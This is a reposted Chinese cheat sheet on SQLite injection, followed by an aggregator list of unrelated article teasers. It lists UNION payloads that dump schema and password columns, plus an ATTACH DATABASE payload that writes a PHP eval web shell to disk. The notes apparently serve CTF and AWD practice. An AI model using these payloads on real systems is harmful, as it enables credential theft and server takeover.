SQLITE 注入

news/2025/2/28 19:43:24/文章来源:https://www.cnblogs.com/meraklbz/p/18743933

sqlite中没有数据库的概念,一个文件就是一个数据库.同时sqlite中严格控制单双引号,要求双引号是表名和列名,单引号是字段的具体值.

union select 1,sqlite_version();
//查询版本union select 1,sql from sqlite_master where type='table';
//查询表名union select 1,sql from sqlite_master where type='table' and name='ctf';
//指定表名查询字段(实际没什么用)union select id,name,pwd from "awdp";
//查询指定列的值union select id,name,group_concat(pwd) from "awdp";
//可以使用group_concat去进行拼接;ATTACH DATABASE 'D:\shell.php' AS shell;create TABLE shell.exp (payload text); insert INTO shell.exp (payload) VALUES ('<?php @eval($_POST["x"]); ?>'); --

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/891309.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

day10 管道符grep 和 find

day10 管道符grep 和 find

day10 管道符grep 和 find grep 命令 grep 是对于数据进行查找的关键词 源数据可以是文件内容 grep hello /opt/hello.txt,找出存在hello的那一行 命令的执行结果 ,这个需要结合管道符使用,cat /etc/passwd | grep root测试数据I teach linux.I like python.My qq is 877…
阅读更多...
[豪の学习笔记] JavaReStudy#07

[豪の学习笔记] JavaReStudy#07

IDEA常用快捷键、包、访问修饰符、OOP封装、OOP继承、super关键字、方法重写/覆盖、OOP多态、Object类详解面向对象编程-进阶部分 1 - IDEA常用快捷键 1.删除当前行 ctrl+Y 2.查看一个类的层级关系 ctrl+H 3.定位方法 ctrl+B 4.自动分配变量名,在后面加 .var 5.导入该行需要的…
阅读更多...
HTB GreenHorn (源码审计、PDF修复) 随笔

HTB GreenHorn (源码审计、PDF修复) 随笔

一、端口信息扫描 Spawn Machine后拿到了IP,先nmap扫一下,输入nmap -sV -sC -v 10.10.11.25 -Pn探到了22,80,3000端口,并且可以发现80端口重定向到了http://greenhorn.htb/页面 输入vim /etc/hosts打开一下hosts文件,添加10.10.11.25 greenhorn.htb再探测一下子域名,看看…
阅读更多...
CS144 Lab2

CS144 Lab2

CS144 Lab2 开始有点痛苦了,因为文档给的并不全面,光读文档是没法覆盖所有的test case的,有太多的业务逻辑要自己考虑。接下来分别就几个难点总结一下: SYN/FIN 有几种情况要特判:当前没收到过SYN,要拒绝所有的segment 当前收到过SYN了,又收到了新的SYN,这得拒绝 当前收…
阅读更多...
msyql三表命令

msyql三表命令

一、建表 create table student( stu_no int, stu_name varchar(10), sex char(1), age int(3), edit varchar(20) ) DEFAULT charset=utf8; insert into student values (1,wang,男,21,hello), (2,小明,女,22,haha2), (3,hu,女,23,haha3), (4,li,男,25,haha4); create table …
阅读更多...
活动报名:Voice Agent 技术现状及应用展望丨 3.8 北京

活动报名:Voice Agent 技术现状及应用展望丨 3.8 北京

「人人发言,所有人向所有人学习!」——Z 沙龙「一起探索下一代语音驱动的人机交互界面。」——RTE 开发者社区3 月 8 日周六下午,北京,「智谱 Z 计划&Z Fund」和「RTE 开发者社区」将合办一场 Voice Agent 主题的线下活动。多家语音模型的技术负责人,多个落地场景(AI…
阅读更多...
Advance Installer Appium环境配置

Advance Installer Appium环境配置

安装参数文件同步环境变量 Path = [python_Dir];[NodeJS_Dir];[AndroidSDK_Dir];[redis_Dir]
阅读更多...
2月solar月赛wp

2月solar月赛wp

2025年Solar应急响应公益月赛-2月暗链排查-1 网站被劫持,被跳转到外部网站,请分析外部原因。本题提供两个端口:第一个端口为ssh端口默认密码为solar@202502第二个端口为被劫持的web服务,路径为 /projectA/index.jsp做的时候,跳转到/projectA/home有一串js代码 拿出里面那串…
阅读更多...
谷歌地图案例 | 为服务不足的银行客户提供优质服务

谷歌地图案例 | 为服务不足的银行客户提供优质服务

谷歌地图占全球导航市场67%,重塑空间运行。Current银行用谷歌地图平台提供精确定位,为“银行服务不足”群体改善财务状况,商家和客户均受益。据Statista最新数据显示,谷歌地图以67%的全球导航市场份额构建起数字时代的基础设施霸权。这项始于2005年的地理信息服务,已完成从…
阅读更多...
解决在Ubuntu中用conda配置环境和下载依赖缓慢问题(重点:mamba)

解决在Ubuntu中用conda配置环境和下载依赖缓慢问题(重点:mamba)

前情:背景:在重现text2cad文章的过程中,通过environment.yml下载环境和依赖(包括pythonocc-core,pytorch等需要conda安装的包)开发环境:Ubuntu待下载的包: 官方environment.yml中要求的包及对应版本要求(之后会根据我的cuda驱动版本等其他问题,对包的版本进行调整):de…
阅读更多...
又一款免费的资产设备管理软件 - WGFIX

又一款免费的资产设备管理软件 - WGFIX

WGFIX是wgcloud团队最近发布的一个资产管理系统,免费开源,而且使用非常简单,部署也很方便,非常适合中小企业使用的一款IT资产设备管理系统 下载:www.wgstart.com WGFIX资产设备管理系统是私有化部署的B/S系统,只需要在本地搭建好WGFIX后,所有用户都通过浏览器来访问使用…
阅读更多...
4D毫米波雷达

4D毫米波雷达

4D毫米波雷达平台产品MRR610 & SRR610是经纬恒润新设计推出的第六代毫米波雷达平台产品,平台选用业内高集成度的SoC解决方案,可为客户提供高性价比雷达单品和多雷达融合解决方案。 4D毫米波雷达平台产品MRR610 & SRR610是经纬恒润新设计推出的第六代毫米波雷达…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023